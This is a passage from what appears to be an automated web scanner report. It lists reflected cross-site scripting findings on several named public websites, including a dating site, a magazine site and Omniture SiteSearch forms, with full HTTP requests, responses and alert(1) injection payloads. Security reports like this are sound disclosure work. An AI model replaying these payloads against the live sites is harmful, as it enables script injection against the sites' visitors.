Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:30:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6131

<html><head><title>100% Free Relationship Needs Assessment</title>

<META name="description" content="A Free Relationship test that measures your needs in a relationship.">
<meta name="KEYW
...[SNIP]...
<form action="?SID=enhftrh2rwh40ylxbcdqkhlw&71843"><script>alert(1)</script>d3bff3c6b0f=1" method="post" name="frmLogin" >
...[SNIP]...

4.527. http://www.plentyoffish.com/poftest.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/poftest.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3702a"><script>alert(1)</script>f50ea53eb4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /poftest.aspx?3702a"><script>alert(1)</script>f50ea53eb4b=1 HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:30:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10025

<html><head><title>100% Free Personality Relationship Chemistry Test</title>

<META name="description" content="A Free Personality test that measures relationship compatibility for singles.">
...[SNIP]...
<form action="?SID=enhftrh2rwh40ylxbcdqkhlw&3702a"><script>alert(1)</script>f50ea53eb4b=1" method="post" name="frmLogin" >
...[SNIP]...

4.528. http://www.plentyoffish.com/seriousintro.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/seriousintro.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f319"><script>alert(1)</script>df4edccc94a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /seriousintro.aspx?8f319"><script>alert(1)</script>df4edccc94a=1 HTTP/1.1
Host: www.plentyoffish.com
Proxy-Connection: keep-alive
Referer: http://www.plentyoffish.com/register.aspx
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw; ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:3738426:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; __utmc=9489908; __utmb=9489908.4.10.1296523584

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 01 Feb 2011 01:30:03 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 10076

<html><title>Plentyoffish.com - Changing The Online Dating Industry</title>

<html><head><title>Plentyoffish.com 100% Free Online Dating Service for singles</title>
<META HTTP-EQUIV="Conten
...[SNIP]...
<form action="?SID=enhftrh2rwh40ylxbcdqkhlw&8f319"><script>alert(1)</script>df4edccc94a=1" method="post" name="frmLogin" >
...[SNIP]...

4.529. http://www.ratestogo.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ratestogo.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed69'-alert(1)-'57cc6386674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?4ed69'-alert(1)-'57cc6386674=1 HTTP/1.1
Host: www.ratestogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:18:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 36741
Content-Type: text/html; Charset=windows-1252
Expires: Tue, 01 Feb 2011 16:18:52 GMT
Set-Cookie: %7CSearchEng%7C=%7C%7C%7C%7C2011%2D2%2D4%7C2011%2D2%2D5%7C; path=/
Set-Cookie: ASPSESSIONIDCCCQTTTR=MOHDHHOALHAINFEGIBOFLLGC; path=/
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<meta http-equiv
...[SNIP]...
.value = responseText; }
   }
   else {
       document.getElementById('invisibleInput').focus();
       var myform=document.getElementById('frmSearch');
       myform.action='http://www.ratestogo.com/Default.asp?4ed69'-alert(1)-'57cc6386674=1'; myform.nPostBack.value=1; myform.submit();
   }
   if(navigator.appName=='Opera'){
    document.getElementById('suburb').selectedIndex = 0;
   }

}
</script>
...[SNIP]...

4.530. http://www.scmagazineus.com/search/xss/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.scmagazineus.com
Path:	/search/xss/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12dbe'-alert(1)-'e5f670c0dc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /search/xss12dbe'-alert(1)-'e5f670c0dc0/ HTTP/1.1
Host: www.scmagazineus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35894
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tqppn045jb4esavsbkl3isfg; path=/; HttpOnly
From: Web2-VM
Date: Thu, 03 Feb 2011 04:05:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
s_adsafe = 'high';
google_afs_adtest = 'off';
google_afs_client = 'haymarketgroup';
google_afs_channel = 'scmagazine_us_afs';
google_afs_hl = 'en';
google_afs_oe = 'utf8';
google_afs_query = 'xss12dbe'-alert(1)-'e5f670c0dc0';
-->
...[SNIP]...

4.531. http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f75c<script>alert(1)</script>f7919591e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts7f75c<script>alert(1)</script>f7919591e3/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 14:34:59 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1296570899"
Last-Modified: Tue, 01 Feb 2011 14:34:59 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close
Content-Length: 27263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts7f75c<script>alert(1)</script>f7919591e3/articles/blood-sugar.html </div>
...[SNIP]...

4.532. http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99e23<script>alert(1)</script>d36e3d1a30d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articles99e23<script>alert(1)</script>d36e3d1a30d/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 14:35:18 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1296570918"
Last-Modified: Tue, 01 Feb 2011 14:35:18 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close
Content-Length: 27265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articles99e23<script>alert(1)</script>d36e3d1a30d/blood-sugar.html </div>
...[SNIP]...

4.533. http://www.shape.com/workouts/articles/blood_sugar.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a635<script>alert(1)</script>5dadd1e4bd0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articles/blood_sugar.html1a635<script>alert(1)</script>5dadd1e4bd0 HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 14:35:45 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1296570945"
Last-Modified: Tue, 01 Feb 2011 14:35:45 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107109 (MII-APC/1.6)
Connection: close
Content-Length: 27265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articles/blood-sugar.html1a635<script>alert(1)</script>5dadd1e4bd0 </div>
...[SNIP]...

4.534. http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d774<script>alert(1)</script>9b61c9a28ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts6d774<script>alert(1)</script>9b61c9a28ac/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 14:35:12 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1296570912"
Last-Modified: Tue, 01 Feb 2011 14:35:12 +0000
X-Powered-By: PHP/5.2.9
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close
Content-Length: 27275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts6d774<script>alert(1)</script>9b61c9a28ac/articles/workout-schedule.html </div>
...[SNIP]...

4.535. http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb792<script>alert(1)</script>6f82f8506a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articlescb792<script>alert(1)</script>6f82f8506a9/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 14:35:27 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1296570927"
Last-Modified: Tue, 01 Feb 2011 14:35:27 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107102 (MII-APC/1.6)
Connection: close
Content-Length: 27275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articlescb792<script>alert(1)</script>6f82f8506a9/workout-schedule.html </div>
...[SNIP]...

4.536. http://www.shape.com/workouts/articles/workout_schedule.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c01ef<script>alert(1)</script>abad6a1bc51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /workouts/articles/workout_schedule.htmlc01ef<script>alert(1)</script>abad6a1bc51 HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 14:35:44 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: max-age=900
Expires:
X-Server-Name: (null)
ETag: "1296570944"
Last-Modified: Tue, 01 Feb 2011 14:35:44 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Via: 1.1 mdw107109 (MII-APC/1.6)
Connection: close
Content-Length: 27275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
<br />
workouts/articles/workout-schedule.htmlc01ef<script>alert(1)</script>abad6a1bc51 </div>
...[SNIP]...

4.537. http://www.sitesearch.omniture.com/contact/form_support.htm [account parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sitesearch.omniture.com
Path:	/contact/form_support.htm

Issue detail

The value of the account request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21416"><script>alert(1)</script>426ca979e1e was submitted in the account parameter. This input was echoed as 21416\"><script>alert(1)</script>426ca979e1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/form_support.htm?first_name=&last_name=&email=&account=21416"><script>alert(1)</script>426ca979e1e HTTP/1.1
Host: www.sitesearch.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:05:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Length: 4526
Connection: close
Content-Type: text/html

<html xml:lang="en" lang="en">
<head>
   <title>Omniture SiteSearch</title>

   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   <meta name="description" content="Web
...[SNIP]...
<INPUT type="text" size="20" maxlength="40" name="account" value="21416\"><script>alert(1)</script>426ca979e1e">
...[SNIP]...

4.538. http://www.sitesearch.omniture.com/contact/form_support.htm [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sitesearch.omniture.com
Path:	/contact/form_support.htm

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61d89"><script>alert(1)</script>4742146ad85 was submitted in the email parameter. This input was echoed as 61d89\"><script>alert(1)</script>4742146ad85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/form_support.htm?first_name=&last_name=&email=61d89"><script>alert(1)</script>4742146ad85&account= HTTP/1.1
Host: www.sitesearch.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:05:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Length: 4526
Connection: close
Content-Type: text/html

<html xml:lang="en" lang="en">
<head>
   <title>Omniture SiteSearch</title>

   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   <meta name="description" content="Web
...[SNIP]...
<INPUT type="text" size="20" maxlength="80" name="email" value="61d89\"><script>alert(1)</script>4742146ad85">
...[SNIP]...

4.539. http://www.sitesearch.omniture.com/contact/form_support.htm [first_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sitesearch.omniture.com
Path:	/contact/form_support.htm

Issue detail

The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a0e"><script>alert(1)</script>9736852f4d7 was submitted in the first_name parameter. This input was echoed as 72a0e\"><script>alert(1)</script>9736852f4d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/form_support.htm?first_name=72a0e"><script>alert(1)</script>9736852f4d7&last_name=&email=&account= HTTP/1.1
Host: www.sitesearch.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:05:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Length: 4526
Connection: close
Content-Type: text/html

<html xml:lang="en" lang="en">
<head>
   <title>Omniture SiteSearch</title>

   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   <meta name="description" content="Web
...[SNIP]...
<INPUT type="text" size="20" maxlength="40" name="firstname" value="72a0e\"><script>alert(1)</script>9736852f4d7">
...[SNIP]...

4.540. http://www.sitesearch.omniture.com/contact/form_support.htm [last_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sitesearch.omniture.com
Path:	/contact/form_support.htm

Issue detail

The value of the last_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 399d0"><script>alert(1)</script>6520bebc9e8 was submitted in the last_name parameter. This input was echoed as 399d0\"><script>alert(1)</script>6520bebc9e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/form_support.htm?first_name=&last_name=399d0"><script>alert(1)</script>6520bebc9e8&email=&account= HTTP/1.1
Host: www.sitesearch.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:05:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Length: 4526
Connection: close
Content-Type: text/html

<html xml:lang="en" lang="en">
<head>
   <title>Omniture SiteSearch</title>

   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   <meta name="description" content="Web
...[SNIP]...
<INPUT type="text" size="20" maxlength="40" name="lastname" value="399d0\"><script>alert(1)</script>6520bebc9e8">
...[SNIP]...

4.541. http://www.theroot.com/multimedia/50-years-black-history [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/multimedia/50-years-black-history

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c92f"><script>alert(1)</script>bd6fb384a18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /multimedia6c92f"><script>alert(1)</script>bd6fb384a18/50-years-black-history?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:57 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:57 GMT
Date: Wed, 02 Feb 2011 16:17:57 GMT
Content-Length: 15118
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/multimedia6c92f"><script>alert(1)</script>bd6fb384a18/50-years-black-history?gt1=38002"/>
...[SNIP]...

4.542. http://www.theroot.com/multimedia/50-years-black-history [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/multimedia/50-years-black-history

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98209"><script>alert(1)</script>e0674eb095a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /multimedia/50-years-black-history98209"><script>alert(1)</script>e0674eb095a?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:18:01 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:02 GMT
Date: Wed, 02 Feb 2011 16:18:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 50675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/multimedia/50-years-black-history98209"><script>alert(1)</script>e0674eb095a?gt1=38002"/>
...[SNIP]...

4.543. http://www.theroot.com/multimedia/50-years-black-history [gt1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/multimedia/50-years-black-history

Issue detail

The value of the gt1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d156"><script>alert(1)</script>bf469ccbd18 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /multimedia/50-years-black-history?gt1=380029d156"><script>alert(1)</script>bf469ccbd18 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:50 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:51 GMT
Date: Wed, 02 Feb 2011 16:17:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/multimedia/50-years-black-history?gt1=380029d156"><script>alert(1)</script>bf469ccbd18"/>
...[SNIP]...

